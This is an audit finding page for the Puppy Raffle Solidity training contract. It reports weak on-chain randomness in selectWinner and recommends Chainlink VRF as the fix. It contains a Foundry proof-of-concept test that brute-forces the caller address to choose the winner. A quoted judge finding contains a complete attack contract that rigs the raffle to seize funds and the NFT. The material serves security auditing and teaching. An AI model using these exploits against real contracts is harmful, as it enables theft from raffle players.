Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Weak randomness in selectWinner allows winner and rarity manipulation

alaaeldinsabib

Summary

The selectWinner function uses predictable on-chain values (msg.sender, block.timestamp, block.difficulty) for randomness. This allows attackers to brute-force and manipulate the winner selection, completely compromising raffle fairness.

Description

The contract uses keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty)) to select the winner. All three values are either predictable or manipulable:

  • msg.sender is controlled by the caller

  • block.timestamp can be slightly manipulated by miners

  • block.difficulty is predictable (pre-merge)

An attacker can brute-force different msg.sender values off-chain until they find one that selects their desired winner, then submit the transaction with that address.

Root Cause

File: src/PuppyRaffle.sol (lines 127-128)

uint256 winnerIndex =
uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

Risk

Severity: High
Likelihood: High
Impact: High

  • ❌ Attacker can predict winner by choosing msg.sender

  • ❌ Miners can manipulate block.timestamp and block.difficulty

  • ❌ Complete compromise of raffle fairness

  • ❌ NFT rarity also manipulable

Proof of Concept

Scenario: Attacker wants player at index 2 to win. They brute-force different msg.sender values off-chain until finding one that produces the desired winner index.

function test_WeakRandomnessCanBeManipulated() public {
// Step 1: Setup - 4 players enter
address[] memory players = new address[](4);
players[0] = address(1);
players[1] = address(2);
players[2] = address(3); // Target winner (index 2)
players[3] = address(4);
raffle.enterRaffle{value: entranceFee * 4}(players);
vm.warp(block.timestamp + duration + 1);
// Step 2: Attacker brute-forces msg.sender to find one that selects index 2
address winningCaller;
for (uint256 i = 0; i < 1000; i++) {
address potentialCaller = address(uint160(i + 10000));
// Replicate the contract's RNG logic
uint256 winnerIndex = uint256(keccak256(abi.encodePacked(
potentialCaller,
block.timestamp + duration + 1,
block.difficulty
))) % 4;
if (winnerIndex == 2) {
winningCaller = potentialCaller;
console.log("Found winning caller at iteration:", i);
break;
}
}
// Step 3: Attacker calls selectWinner with the manipulated caller
vm.prank(winningCaller);
raffle.selectWinner();
// Step 4: Verify the attack succeeded - player at index 2 won
assertEq(raffle.previousWinner(), address(3));
console.log("VULNERABILITY: Winner manipulated via weak randomness!");
}

Test Output:

Found winning caller at iteration: 23
VULNERABILITY: Winner manipulated via weak randomness!

What This Proves:

  1. ✅ Attacker can find a msg.sender that selects desired winner

  2. ✅ Winner selection is predictable and manipulable

  3. ✅ Raffle fairness is completely compromised

Recommended Mitigation

Use Chainlink VRF for provably fair randomness:

import {VRFConsumerBase} from "@chainlink/contracts/src/v0.6/VRFConsumerBase.sol";
contract PuppyRaffle is VRFConsumerBase {
function selectWinner() external {
// Request randomness from Chainlink VRF
requestRandomness(keyHash, fee);
}
function fulfillRandomness(bytes32 requestId, uint256 randomness) internal override {
uint256 winnerIndex = randomness % players.length;
// ... distribute prizes using provably fair randomness
}
}

Why This Fixes It:

  1. ✅ Chainlink VRF provides cryptographically secure randomness

  2. ✅ Randomness cannot be predicted or manipulated

  3. ✅ Both winner selection and NFT rarity are secure

References

  • SWC-120: Weak Sources of Randomness from Chain Attributes

  • CWE-330: Use of Insufficiently Random Values

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 8 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!